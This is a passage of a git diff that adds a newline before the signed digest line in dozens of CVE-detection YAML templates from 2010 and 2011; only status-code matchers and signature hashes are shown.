4b0a00483046022100e7fbb1d6146d765bef5c137ad3370ce3a842e723476577c4d206596e75cf9510022100928cbaec302c73840efdcd6fc1caef607240b2da84be297e864e6800dc86af33:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-2033.yaml b/http/cves/2010/CVE-2010-2033.yaml index e65e174650..3d00d10dc3 100644 --- a/http/cves/2010/CVE-2010-2033.yaml +++ b/http/cves/2010/CVE-2010-2033.yaml @@ -37,4 +37,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402203fc911afbcc1f690602ad8f154180c725fee3e301a6540fd2e05d1450796785702207b1d37aabfc24faf4c77199a8079a1ad70f58d926c92061c535054cc88ec41e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402203fc911afbcc1f690602ad8f154180c725fee3e301a6540fd2e05d1450796785702207b1d37aabfc24faf4c77199a8079a1ad70f58d926c92061c535054cc88ec41e8:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-2034.yaml b/http/cves/2010/CVE-2010-2034.yaml index df6c8c3474..06bd12ec46 100644 --- a/http/cves/2010/CVE-2010-2034.yaml +++ b/http/cves/2010/CVE-2010-2034.yaml @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 490a00463044022018da626f00cccbc378f76e23b1b9ad97327848fb04a7ebea8cfdd92f332a170c02206c1cd8a4bc9a033745aa93fb43c909f6647fedda26eefd90f275ea20c67c6e70:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022018da626f00cccbc378f76e23b1b9ad97327848fb04a7ebea8cfdd92f332a170c02206c1cd8a4bc9a033745aa93fb43c909f6647fedda26eefd90f275ea20c67c6e70:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-2035.yaml b/http/cves/2010/CVE-2010-2035.yaml index 675a06c493..b1912c2f9e 100644 --- a/http/cves/2010/CVE-2010-2035.yaml +++ b/http/cves/2010/CVE-2010-2035.yaml @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220769b53510025beb72cee554a30cbeb4a3e31a8547970c0ba18e845b507a6485a022100d52174a37f5331625616c9d750df64cf8a1436536c603066210761f8a3293d7f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450220769b53510025beb72cee554a30cbeb4a3e31a8547970c0ba18e845b507a6485a022100d52174a37f5331625616c9d750df64cf8a1436536c603066210761f8a3293d7f:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-2036.yaml b/http/cves/2010/CVE-2010-2036.yaml index 18e0dd2cb3..f8347868a1 100644 --- a/http/cves/2010/CVE-2010-2036.yaml +++ b/http/cves/2010/CVE-2010-2036.yaml @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c6f450fdeba6cdf194f3098bf58e2f7f87f7d3d52fea772dcd95839efd0ee36102201cc08d6edc39ca025176c684ced6f23244808cd8581a143eb58f6355d23d56c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100c6f450fdeba6cdf194f3098bf58e2f7f87f7d3d52fea772dcd95839efd0ee36102201cc08d6edc39ca025176c684ced6f23244808cd8581a143eb58f6355d23d56c1:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-2037.yaml b/http/cves/2010/CVE-2010-2037.yaml index cebe06efb4..6c84252f40 100644 --- a/http/cves/2010/CVE-2010-2037.yaml +++ b/http/cves/2010/CVE-2010-2037.yaml @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100b2860ffc68e98d48578d9d08543bdadab6961dc47bacf1f254da8487fda800db022100ce311b6524ae3c8d7bf718ed22054f1c46d0fa5fc974830c33b75cfc242e16ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100b2860ffc68e98d48578d9d08543bdadab6961dc47bacf1f254da8487fda800db022100ce311b6524ae3c8d7bf718ed22054f1c46d0fa5fc974830c33b75cfc242e16ad:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-2045.yaml b/http/cves/2010/CVE-2010-2045.yaml index be851e49fa..68f7160da9 100644 --- a/http/cves/2010/CVE-2010-2045.yaml +++ b/http/cves/2010/CVE-2010-2045.yaml @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402204e04717952b752ae006c6e2f8bc75601e2f1ed1350552a254136c19ea046e6f502203608f15dcff7961e544d3f0d14597c7ba23ed7427178970abf9caa292445d11f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402204e04717952b752ae006c6e2f8bc75601e2f1ed1350552a254136c19ea046e6f502203608f15dcff7961e544d3f0d14597c7ba23ed7427178970abf9caa292445d11f:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-2050.yaml b/http/cves/2010/CVE-2010-2050.yaml index 1261ef222c..e3d1c842d3 100644 --- a/http/cves/2010/CVE-2010-2050.yaml +++ b/http/cves/2010/CVE-2010-2050.yaml @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402207e09729f02d9a172e10ec46944fa11628d8fdc9ace04ef4bec3e5781a0963e21022066e2985cd79c51516e7c2398595e628e52f795a8901714d876ccd4fee83fa944:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402207e09729f02d9a172e10ec46944fa11628d8fdc9ace04ef4bec3e5781a0963e21022066e2985cd79c51516e7c2398595e628e52f795a8901714d876ccd4fee83fa944:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-2122.yaml b/http/cves/2010/CVE-2010-2122.yaml index 4844725e78..3f21627170 100644 --- a/http/cves/2010/CVE-2010-2122.yaml +++ b/http/cves/2010/CVE-2010-2122.yaml @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502206eb29fee954e502f6bb66c6f9d0d4941802b0de7536098697d6866227f2a8864022100bc85f80d860fe5609b0fc8fb47ef49e0b16226845296638053c817aff6409c49:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502206eb29fee954e502f6bb66c6f9d0d4941802b0de7536098697d6866227f2a8864022100bc85f80d860fe5609b0fc8fb47ef49e0b16226845296638053c817aff6409c49:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-2128.yaml b/http/cves/2010/CVE-2010-2128.yaml index 19428d22c3..2590ac3041 100644 --- a/http/cves/2010/CVE-2010-2128.yaml +++ b/http/cves/2010/CVE-2010-2128.yaml @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 490a004630440220381e0f96b5a9db0a5c4e4e4b7533c313bb44922c56aed2f16e3e4f844d9657d2022027989a8c94176f57fa1afe7d85d29bfadabd944445892af09bd7bdf030475de4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a004630440220381e0f96b5a9db0a5c4e4e4b7533c313bb44922c56aed2f16e3e4f844d9657d2022027989a8c94176f57fa1afe7d85d29bfadabd944445892af09bd7bdf030475de4:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-2259.yaml b/http/cves/2010/CVE-2010-2259.yaml index 01e824b8e8..7cd20aa329 100644 --- a/http/cves/2010/CVE-2010-2259.yaml +++ b/http/cves/2010/CVE-2010-2259.yaml @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100cd98a432bed2f03ea7bde695b7b4b451d8226b92bf2d75318fb3c73798f17451022100dbbb3be8337b6fc2f41f5537fa39f4bacb925094970b7eb24eb75c60a003d5c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100cd98a432bed2f03ea7bde695b7b4b451d8226b92bf2d75318fb3c73798f17451022100dbbb3be8337b6fc2f41f5537fa39f4bacb925094970b7eb24eb75c60a003d5c5:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-2307.yaml b/http/cves/2010/CVE-2010-2307.yaml index d02a632a00..676c317eef 100644 --- a/http/cves/2010/CVE-2010-2307.yaml +++ b/http/cves/2010/CVE-2010-2307.yaml @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 490a00463044022036ef84ade03787325d38bcb42a9d8a5cfd6e322b5765a45a3d2043123a4bc734022054f04c144aae35758c289686485af1cd924efd251bc1c894762c82361752994a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022036ef84ade03787325d38bcb42a9d8a5cfd6e322b5765a45a3d2043123a4bc734022054f04c144aae35758c289686485af1cd924efd251bc1c894762c82361752994a:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-2507.yaml b/http/cves/2010/CVE-2010-2507.yaml index cc31487326..41922bd86f 100644 --- a/http/cves/2010/CVE-2010-2507.yaml +++ b/http/cves/2010/CVE-2010-2507.yaml @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 490a00463044022016624c3e9edddf9160b1a009c0afd2cdd6872969e3e43518c677c9d8103fbbd50220692d0e828deae1cd3d0e743e408185dcbee1be6a728a940f3c934a72327590b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022016624c3e9edddf9160b1a009c0afd2cdd6872969e3e43518c677c9d8103fbbd50220692d0e828deae1cd3d0e743e408185dcbee1be6a728a940f3c934a72327590b7:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-2680.yaml b/http/cves/2010/CVE-2010-2680.yaml index f4263ad709..7f14ab3ecc 100644 --- a/http/cves/2010/CVE-2010-2680.yaml +++ b/http/cves/2010/CVE-2010-2680.yaml @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100fdb1607e692649e60d3960b435391caf950bbb1c4847500f527790ade9fd071e022100f33f1ae42323fcbb83f73f91875a1d4c051558f0fc9152dfb6de0577511c561d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100fdb1607e692649e60d3960b435391caf950bbb1c4847500f527790ade9fd071e022100f33f1ae42323fcbb83f73f91875a1d4c051558f0fc9152dfb6de0577511c561d:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-2682.yaml b/http/cves/2010/CVE-2010-2682.yaml index 266366b61f..4067919902 100644 --- a/http/cves/2010/CVE-2010-2682.yaml +++ b/http/cves/2010/CVE-2010-2682.yaml @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502200f42701cdf7b888b75552ae393fdedb23d85551805c55eeece997cb4dc3cb334022100f18b86217bd6bb295c40b618649cd0acc29cca0496823c7140e358f8ea1eb6c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502200f42701cdf7b888b75552ae393fdedb23d85551805c55eeece997cb4dc3cb334022100f18b86217bd6bb295c40b618649cd0acc29cca0496823c7140e358f8ea1eb6c3:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-2857.yaml b/http/cves/2010/CVE-2010-2857.yaml index c7e530a391..37b8130e91 100644 --- a/http/cves/2010/CVE-2010-2857.yaml +++ b/http/cves/2010/CVE-2010-2857.yaml @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022044a0248ea364132f3cea11357ff300d7e1f34cd30b939c4b3c9dfc3a98f6a5b7022100da15a76b34084e24e130af0347d0612d67f58aa385e5aa3cce1c655617098dc2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022044a0248ea364132f3cea11357ff300d7e1f34cd30b939c4b3c9dfc3a98f6a5b7022100da15a76b34084e24e130af0347d0612d67f58aa385e5aa3cce1c655617098dc2:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-2861.yaml b/http/cves/2010/CVE-2010-2861.yaml index 70f2e756c1..10ac9dcb06 100644 --- a/http/cves/2010/CVE-2010-2861.yaml +++ b/http/cves/2010/CVE-2010-2861.yaml @@ -44,4 +44,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e80ac21d0d703ab937f85164cdfadeabb012819e4317857b39a71e056e619a8f022100eb09c97df5a8044b9cf99150fa67f65fadcc2c7e087b0d48078d4c03afc8979a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100e80ac21d0d703ab937f85164cdfadeabb012819e4317857b39a71e056e619a8f022100eb09c97df5a8044b9cf99150fa67f65fadcc2c7e087b0d48078d4c03afc8979a:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-2918.yaml b/http/cves/2010/CVE-2010-2918.yaml index 785a0864da..7859ec6b66 100644 --- a/http/cves/2010/CVE-2010-2918.yaml +++ b/http/cves/2010/CVE-2010-2918.yaml @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100b70d34d665813ec72fe5ad285d91273be1a37a95899eb0c5cf7228f45cf726f0022100d5416252c75ee73ef00288bf57eab39a22324dc27738fbb0c63e8c8105f88a49:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100b70d34d665813ec72fe5ad285d91273be1a37a95899eb0c5cf7228f45cf726f0022100d5416252c75ee73ef00288bf57eab39a22324dc27738fbb0c63e8c8105f88a49:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-2920.yaml b/http/cves/2010/CVE-2010-2920.yaml index 2d2950b632..e9e997d5a8 100644 --- a/http/cves/2010/CVE-2010-2920.yaml +++ b/http/cves/2010/CVE-2010-2920.yaml @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502207055d16fc5b259dcad6ee9f8d031110b5a85a0c26c084d1b7ccdffb10e0963f3022100db5e7bd877ad7efac321c6ab90f8cc9cee614163ae16400a6608020b0ce338d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502207055d16fc5b259dcad6ee9f8d031110b5a85a0c26c084d1b7ccdffb10e0963f3022100db5e7bd877ad7efac321c6ab90f8cc9cee614163ae16400a6608020b0ce338d0:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-3203.yaml b/http/cves/2010/CVE-2010-3203.yaml index 5364522d41..f8c0dcde38 100644 --- a/http/cves/2010/CVE-2010-3203.yaml +++ b/http/cves/2010/CVE-2010-3203.yaml @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402205df1f5bd8a3d7fe9e5d5abc0cafaf535173f7679aeab84ee191dd11189dca37f02206e196bd82bc36878a4e880968c19acdf71dab84c6f1075754d2fa40ec0839386:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402205df1f5bd8a3d7fe9e5d5abc0cafaf535173f7679aeab84ee191dd11189dca37f02206e196bd82bc36878a4e880968c19acdf71dab84c6f1075754d2fa40ec0839386:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-3426.yaml b/http/cves/2010/CVE-2010-3426.yaml index 6dc12c8715..3210e13c21 100644 --- a/http/cves/2010/CVE-2010-3426.yaml +++ b/http/cves/2010/CVE-2010-3426.yaml @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022077ea4b2e00f56fb21006da930c9f1162342f1078bba73623d6fae7ee882b2061022100882c9128a67a2245be71c1183235d35d1951c21a58f3ce3a6122e096ece45d03:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022077ea4b2e00f56fb21006da930c9f1162342f1078bba73623d6fae7ee882b2061022100882c9128a67a2245be71c1183235d35d1951c21a58f3ce3a6122e096ece45d03:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-4231.yaml b/http/cves/2010/CVE-2010-4231.yaml index c8e088769f..0d36ebf386 100644 --- a/http/cves/2010/CVE-2010-4231.yaml +++ b/http/cves/2010/CVE-2010-4231.yaml @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502207158b739cbe6a089d316bdca0ba65df9107fc1b12cdbfb5c0b7989213b6c216a022100db393e66c4863b1f731ca60fec83c43af8907b5432a1b6feed2d7aa0a0ea3f52:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502207158b739cbe6a089d316bdca0ba65df9107fc1b12cdbfb5c0b7989213b6c216a022100db393e66c4863b1f731ca60fec83c43af8907b5432a1b6feed2d7aa0a0ea3f52:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-4239.yaml b/http/cves/2010/CVE-2010-4239.yaml index 3653d1983a..b5c573d04e 100644 --- a/http/cves/2010/CVE-2010-4239.yaml +++ b/http/cves/2010/CVE-2010-4239.yaml @@ -40,4 +40,5 @@ http: - "fonts" - "extensions" condition: and -# digest: 4b0a00483046022100ec9e783ec41e7807ef5da7e3de78318678c804f1516112ef378b382cd0ae94d1022100c86a3aa85393ceee941cdfb693b107ad0e46c65b5fc81da527d4113a1f6066e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100ec9e783ec41e7807ef5da7e3de78318678c804f1516112ef378b382cd0ae94d1022100c86a3aa85393ceee941cdfb693b107ad0e46c65b5fc81da527d4113a1f6066e0:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-4282.yaml b/http/cves/2010/CVE-2010-4282.yaml index be53f74581..14f93da9e6 100644 --- a/http/cves/2010/CVE-2010-4282.yaml +++ b/http/cves/2010/CVE-2010-4282.yaml @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100bce3e791f2d54bb0157227f851778274d104a9ba5277fb60a76e44353781815902207c05b63dd04c2adc453b7a3714a2fbbcbf8f7e2c355ff0391c4f18da698e11d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100bce3e791f2d54bb0157227f851778274d104a9ba5277fb60a76e44353781815902207c05b63dd04c2adc453b7a3714a2fbbcbf8f7e2c355ff0391c4f18da698e11d1:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-4617.yaml b/http/cves/2010/CVE-2010-4617.yaml index 75f71ec1e2..80bc5c3cb0 100644 --- a/http/cves/2010/CVE-2010-4617.yaml +++ b/http/cves/2010/CVE-2010-4617.yaml @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 490a00463044022057fdae04b2a3b0affb389e526ac7acc54c2966bc58b06516dbc5deae2d6f5c720220566b197e676b5bc3df7452055c103c1a4b65eab45e3b792341bb1b18b7f622eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022057fdae04b2a3b0affb389e526ac7acc54c2966bc58b06516dbc5deae2d6f5c720220566b197e676b5bc3df7452055c103c1a4b65eab45e3b792341bb1b18b7f622eb:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-4719.yaml b/http/cves/2010/CVE-2010-4719.yaml index 56abb66b05..b92066ec80 100644 --- a/http/cves/2010/CVE-2010-4719.yaml +++ b/http/cves/2010/CVE-2010-4719.yaml @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f8aa22307bdbc96f124941172a40ca95cd2dca8978d71e36c01edecc5e19f7dd0221009dc1b5ef96440787705ed8ab115f391973bf6d858df20bf96df6ba435595dfe6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100f8aa22307bdbc96f124941172a40ca95cd2dca8978d71e36c01edecc5e19f7dd0221009dc1b5ef96440787705ed8ab115f391973bf6d858df20bf96df6ba435595dfe6:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-4769.yaml b/http/cves/2010/CVE-2010-4769.yaml index 2782b92b62..c1f6e71d35 100644 --- a/http/cves/2010/CVE-2010-4769.yaml +++ b/http/cves/2010/CVE-2010-4769.yaml @@ -37,4 +37,5 @@ http: - type: status status: - 200 -# digest: 490a004630440220404c973b12329379bf1313757324728658d81b00096c3bb371dd550a02845d8b02207cda4c7ace0db75afb3c9c331d8014e864f98cd672744e90359091bc51be55cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a004630440220404c973b12329379bf1313757324728658d81b00096c3bb371dd550a02845d8b02207cda4c7ace0db75afb3c9c331d8014e864f98cd672744e90359091bc51be55cd:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-4977.yaml b/http/cves/2010/CVE-2010-4977.yaml index fc210d8f92..93aff36161 100644 --- a/http/cves/2010/CVE-2010-4977.yaml +++ b/http/cves/2010/CVE-2010-4977.yaml @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 490a004630440220019cd775be2b353b54e3143f096e2362479a7b697969dcc5dc7a0877785db91602204eb52fcfebe1d7c983ca3e2398bce35635b8105cb80442db3b0c91a5c2ae3e97:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a004630440220019cd775be2b353b54e3143f096e2362479a7b697969dcc5dc7a0877785db91602204eb52fcfebe1d7c983ca3e2398bce35635b8105cb80442db3b0c91a5c2ae3e97:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-5028.yaml b/http/cves/2010/CVE-2010-5028.yaml index a5e23ed081..f7ad173da4 100644 --- a/http/cves/2010/CVE-2010-5028.yaml +++ b/http/cves/2010/CVE-2010-5028.yaml @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b1ced13fe81ecfd6c9eb87d7d73a090345669ed824c302f95667bc956afc936202203ea4983bc211903f2ad2ee290d4f2236d7db4eb0053aef71011e94d384e97077:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100b1ced13fe81ecfd6c9eb87d7d73a090345669ed824c302f95667bc956afc936202203ea4983bc211903f2ad2ee290d4f2236d7db4eb0053aef71011e94d384e97077:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-5278.yaml b/http/cves/2010/CVE-2010-5278.yaml index b5ce8222f6..aa277c40a8 100644 --- a/http/cves/2010/CVE-2010-5278.yaml +++ b/http/cves/2010/CVE-2010-5278.yaml @@ -45,4 +45,5 @@ http: - type: status status: - 200 -# digest: 490a004630440221009d6beed768c783eb8e731c4498beaa308feab78e07724f8fb2d52bcd7151b2c3021f6ec6ed0cd6df8ecff717b6055e3fa3ca9cd3a6ed03e7d2e248bfe9da31c316:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a004630440221009d6beed768c783eb8e731c4498beaa308feab78e07724f8fb2d52bcd7151b2c3021f6ec6ed0cd6df8ecff717b6055e3fa3ca9cd3a6ed03e7d2e248bfe9da31c316:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-5286.yaml b/http/cves/2010/CVE-2010-5286.yaml index c923d87617..db8a0c901b 100644 --- a/http/cves/2010/CVE-2010-5286.yaml +++ b/http/cves/2010/CVE-2010-5286.yaml @@ -38,4 +38,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100eeccf34a02d926dd217e6b79289ea8b246d660511a748ef2d45a4ba7cb75b094022032e47850f91f507ca67e1adacc8656d48cd496875b16d032c3f52e92e230e440:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100eeccf34a02d926dd217e6b79289ea8b246d660511a748ef2d45a4ba7cb75b094022032e47850f91f507ca67e1adacc8656d48cd496875b16d032c3f52e92e230e440:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2011/CVE-2011-0049.yaml b/http/cves/2011/CVE-2011-0049.yaml index a541d3e5f3..fa67e51d97 100644 --- a/http/cves/2011/CVE-2011-0049.yaml +++ b/http/cves/2011/CVE-2011-0049.yaml @@ -41,4 +41,5 @@ http: - type: status status: - 200 -# digest: 490a00463044022045253f5476779c45c5c138cb762d9840c4754f831e115c957eb60029c259dffe0220221d958f97dfde85b7d3a259d5f2a31898b5424c7cc951b4f8e21ddc3c104f07:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022045253f5476779c45c5c138cb762d9840c4754f831e115c957eb60029c259dffe0220221d958f97dfde85b7d3a259d5f2a31898b5424c7cc951b4f8e21ddc3c104f07:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2011/CVE-2011-1669.yaml b/http/cves/2011/CVE-2011-1669.yaml index ad1488e933..676679836c 100644 --- a/http/cves/2011/CVE-2011-1669.yaml +++ b/http/cves/2011/CVE-2011-1669.yaml @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 490a00463044022018bf475e6ba6ddd6403f630b8b557e57c8b50edd620f9b0689a719f11f90fda2022057e895066ac53cec4b3d9a170fbc991e37f801339686ed7b00ccb01efcb6dbe1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022018bf475e6ba6ddd6403f630b8b557e57c8b50edd620f9b0689a719f11f90fda2022057e895066ac53cec4b3d9a170fbc991e37f801339686ed7b00ccb01efcb6dbe1:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2011/CVE-2011-2744.yaml b/http/cves/2011/CVE-2011-2744.yaml index d3e71583ec..5d1dd68c9b 100644 --- a/http/cves/2011/CVE-2011-2744.yaml +++ b/http/cves/2011/CVE-2011-2744.yaml @@ -41,4 +41,5 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221008a41ec7a040ef78d4c16dfb9fef7d5ae8301510b1438265d9875e67195c5203c022100965a07d8ff70aaf747cd9f8780f6a451e7a940655c2df9ba883e5f1317dd69de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a004830460221008a41ec7a040ef78d4c16dfb9fef7d5ae8301510b1438265d9875e67195c5203c022100965a07d8ff70aaf747cd9f8780f6a451e7a940655c2df9ba883e5f1317dd69de:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2011/CVE-2011-2780.yaml b/http/cves/2011/CVE-2011-2780.yaml index 36fdcce903..b61a5d2436 100644 --- a/http/cves/2011/CVE-2011-2780.yaml +++ b/http/cves/2011/CVE-2011-2780.yaml @@ -41,4 +41,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100810714f09875b552b7ea49f35fab14ed7f6b131e22c5ee69f85ce87612526a72022041d54252611ff09977fa7e342fd9df6ab837778fd976ce49eba3d6b285d61184:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100810714f09875b552b7ea49f35fab14ed7f6b131e22c5ee69f85ce87612526a72022041d54252611ff09977fa7e342fd9df6ab837778fd976ce49eba3d6b285d61184:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2011/CVE-2011-3315.yaml b/http/cves/2011/CVE-2011-3315.yaml index 133050811a..b3327d3e15 100644 --- a/http/cves/2011/CVE-2011-3315.yaml +++ b/http/cves/2011/CVE-2011-3315.yaml @@ -38,4 +38,5 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220312ee4096c81a98ebff2a91a9240da29e7d366bd1c39846114e7d8fb9c31dd5b022100e7ea08a12c133ca88629d9d4f653216e5f57739ae75e47bc793889a713a6f4f6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450220312ee4096c81a98ebff2a91a9240da29e7d366bd1c39846114e7d8fb9c31dd5b022100e7ea08a12c133ca88629d9d4f653216e5f57739ae75e47bc793889a713a6f4f6:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2011/CVE-2011-4336.yaml b/http/cves/2011/CVE-2011-4336.yaml index 92a7da61a1..37e38180f4 100644 --- a/http/cves/2011/CVE-2011-4336.yaml +++ b/http/cves/2011/CVE-2011-4336.yaml @@ -43,4 +43,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402207a961d309c00cab4385c8cb46299c18e0096dfc3d3163864fdf95a6beaa9a41f02206c9c2f6f5254a78a164ddd2a02c34d05f55715535d967110cef4b73b7a299a9f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402207a961d309c00cab4385c8cb46299c18e0096dfc3d3163864fdf95a6beaa9a41f02206c9c2f6f5254a78a164ddd2a02c34d05f55715535d967110cef4b73b7a299a9f:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2011/CVE-2011-4624.yaml b/http/cves/2011/CVE-2011-4624.yaml index e117eebecb..a3d0dbf13e 100644 --- a/http/cves/2011/CVE-2011-4624.yaml +++ b/http/cves/2011/CVE-2011-4624.yaml @@ -47,4 +47,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f41585e43bce5dfa3696db7f7825ca360de06d09c82b30602ba632eac09d562e02210086d4dc93a2dd0be1955579a5ecd07ea817f958b3dd176f8584ac517ca84fafca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100f41585e43bce5dfa3696db7f7825ca360de06d09c82b30602ba632eac09d562e02210086d4dc93a2dd0be1955579a5ecd07ea817f958b3dd176f8584ac517ca84fafca:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2011/CVE-2011-4804.yaml b/http/cves/2011/CVE-2011-4804.yaml index ecaa89c1f2..457db7ba0e 100644 --- a/http/cves/2011/CVE-2011-4804.yaml +++ b/http/cves/2011/CVE-2011-4804.yaml @@ -38,4 +38,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b77d8df43dc9d5471227b4896b072f47594be3f792a8be12b6a66c43ea82aee002207e476a965bed92922d1e869481768c98cebe368fa5d341dd9c946dafc6c28ca6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 